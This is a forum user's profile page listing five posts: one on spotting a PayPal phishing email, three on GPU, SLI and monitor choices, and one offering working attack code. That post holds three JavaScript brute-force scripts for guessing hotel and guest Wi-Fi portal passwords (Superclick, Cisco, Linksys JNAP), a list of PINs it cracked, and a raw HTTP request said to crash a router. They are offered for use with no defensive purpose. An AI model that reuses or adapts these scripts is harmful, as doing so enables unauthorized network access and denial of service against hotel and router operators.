Jump to content

vt-x

Member
  • Posts

    5
  • Joined

  • Last visited

Awards

This user doesn't have any awards

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. But make sure to not reply to the email directly asking if they're legit, because even if it appears to have come from the right domain, sometimes scammers will have the "reply-to" field set to their email address. -- Since this thread references phishing several times, i'd like to add on to one of my recent experiences with a phishing email that looked quite legitimate. I recently received a phishing email claiming to be from "Paypal" and it looked legitimate from my phone. As you can see in this image, it says it's from a "trusted sender" (sorry it's a bit blurred, the green text states "This message is from a trusted sender.") I've been doing transactions on my PP recently so I thought it was possibly legitimate, as PP loves to limit accounts. But the fact that they refer to my email "XXX@live.jp" instead of my name and some various flaws raised some red flags very quickly. Had they done my name instead of referring to me by my email, I might've even opened the link. This is the same exact phishing email when viewed from my desktop: If you look closely, there are 4 major problems on the desktop version: the reply-to email is definitely not from PP, there's some weird characters(charset set to ascii when it's utf8?), they reference you by your email when it should be your name, and when you hover over the link, it's definitely not from PP: Btw the site is flagged as dangerous on chrome, but it wasn't at the time I first received the email.
  2. Some hotel wifi networks are open, but require you to authenticate with an easily crackable password, so here's a way to bypass that. Made it back in early 2017. For multiple different hotels. var code = 1000, x, i = 0, concurrent_requests = 0; //Hotel wifi password cracker(Superclick) function CrackHotelWifiPassword() { if (code == 10000) clearInterval(x); if (concurrent_requests >= 20) return; //max 20 req running at a time concurrent_requests++; var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "/superclick/wifi_accept.php"); xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xmlhttp.code = code; xmlhttp.onreadystatechange = function() { if (this.readyState === this.DONE) { concurrent_requests--; var loc = this.responseURL;//this.getResponseHeader("Location"); console.log(loc); if (loc.indexOf("errcode=1") !== -1){ //otherwise it's empty because: http://prntscr.com/elmb70 //console.log('Invalid code: ' + this.code); } else{ console.log('Valid code: ' + this.code); //clearInterval(x); } } } xmlhttp.send("yesval=yes&noval=no&button=yes&password=" + (code++)); } x = setInterval(CrackHotelWifiPassword, 250); //note: must be executed when on https://p2593.superclick.com/std/holiday_inn_new/login_wifi_pin.php?group=4&roomid=1&lang=en&deflang=en&preview= results: /* 1005 , 1113, 1170, 1233, 1303, 1329, 1450, 1534, 1766, 1793, 1895, 2159, */ 2. //------------------------------------------------------------------------------------------------ //for: (product=Cisco Router, notes=for the ones with only the password field) var index = 0, code = 0, concurrent_requests = 0; var sec_prefixes = ["cucumber", "lettuce", "kiwi", "olive", "potato", "tomato", "onion", "cabbage", "carrot", "eggplant", "radish", "garlic", "turnip", "maize", "broccoli", "spinach", "celery", "scallion", "zucchini", "artichoke"]; var x = setInterval(function(){ if (concurrent_requests >= 40) return; //max 40 req running at a time if (code == 100){ code = 0; index++; } if (index == sec_prefixes.length){ clearInterval(x); return; } concurrent_requests++; id = sec_prefixes[index] + ("00" + code++).slice(-2); var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "/guestnetwork.cgi"); xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xmlhttp.code = id; xmlhttp.onreadystatechange = function() { if (this.readyState === this.DONE) { concurrent_requests--; if (this.responseText.indexOf("var deny='1'") === -1){ console.log("Found PWD: " + this.responseURL + " - " + this.pwd); clearInterval(x); } else console.log('Incorrect PWD: ' + this.pwd); } } xmlhttp.send("submit_button=login&change_action=&action=Apply&wait_time=0&submit_type=&gn_host_url=google.com&gn_view_type=0&guest_login=" + encodeURIComponent(id)); }, 10); 3 //--------------------------------------------------------------------------------------- //LINKSYS Smart Wi-Fi guest password cracker var code = 1, concurrent_requests = 0; x = setInterval(function() { if (code == 10000) clearInterval(x); if (concurrent_requests >= 20) return; //max 20 req running at a time concurrent_requests++; var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "/JNAP/"); xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xmlhttp.setRequestHeader('X-JNAP-Action', 'http://cisco.com/jnap/guestnetwork/Authenticate'); xmlhttp.setRequestHeader('X-JNAP-Authorization', 'undefined'); xmlhttp.code = code; xmlhttp.onreadystatechange = function() { if (this.readyState === this.DONE) { concurrent_requests--; var loc = this.responseURL;//this.getResponseHeader("Location"); if (loc.indexOf('"result": "ErrorInvalidPassword"') !== -1){ //otherwise it's empty because: console.log('Valid code: ' + this.code); } } } xmlhttp.send('{"macAddress":"d0:53:49:3e:90:ed","ipAddress":"192.168.3.125","password":"'+ (code++) +'"}'); }, 10); crash the wifi: POST http://192.168.3.1:10080/JNAP/ HTTP/1.1 Host: 192.168.3.1:10080 Connection: keep-alive Content-Length: 52 X-JNAP-Action: http://cisco.com/jnap/guestnetwork/Authenticate X-JNAP-Authorization: undefined Origin: http://192.168.3.1:10080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 Content-Type: application/json; charset=UTF-8 Accept: */* Cache-Control: no-cache X-Requested-With: XMLHttpRequest Expires: Sun Mar 19 2017 17:51:19 GMT-0500 (Central Daylight Time) DNT: 1 Referer: http://192.168.3.1:10080/ui/dynamic/guest-login.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 {"macAddress":"","ipAddress":null,"password":"1234"}
  3. I'm planning on playing mostly PUBG/Fortnite (but I heard it doesn't support SLI if I remember correctly). But I also intend to play tomb raider, etc. This is my first PC build(and I haven't done much gaming on my laptop since it has stuttering issues) so I guess i'll be doing a lot of gaming in my free time.
  4. I will definitely be getting a 144hz 1440p monitor(probably the Dell Gaming S2716DGR), but I also want a 4k monitor for watching movies and stuff.
  5. So for my first pc build I bought a EVGA GeForce RTX 2080 Ti XC Ultra Gaming, and then later a rtx 2080 TI Founder's Edition since I was thinking of doing 4k 144hz gaming, until some people on reddit said SLI is in a bad state, so I watched a YT vid where this guy used two RTX 2080 TIs and sometimes his frames would be delayed up to 44ms. So I guess I'll probably be returning the evga one(or maybe the FE), as I couldn't cancel the order. But i'm still curious, would it be possible to run the two in NVLINK-SLI? Since they're two different brands? I contacted EVGA about it and they said: Hello, Thank you for contacting the EVGA Customer Service Team. No with the 20 series they use the NV Link not SLI. The cards have to be the same series product in order to being able to be used in the NV Link or SLI. Regards, EVGA However, JayzTwoCents from youtube says it's just fine. Reference: https://youtu.be/cbvFb0IHTg0?t=67 So i'm not sure. For my next question, would someone recommend me a good 4k 60hz monitor? I looked at the Acer Predator XB321HK, but on Amazon there are a lot of negative reviews stating the monitor has a 2yo GSync bug which causes the screen to black out. And last question, would a 1000 watt PSU be enough to run the two rtx 2080 TIs in SLI? edit: should've probably posted this in troubleshooting as only 2 of my questions are directly related to gpus, my bad. If a staff member can move it i'd appreciate it. edit2: just curious for the future(probably won't be doing SLI this time), but how do you guys select the bridge size for the NVLink? It says: But i'm not sure what that means.
×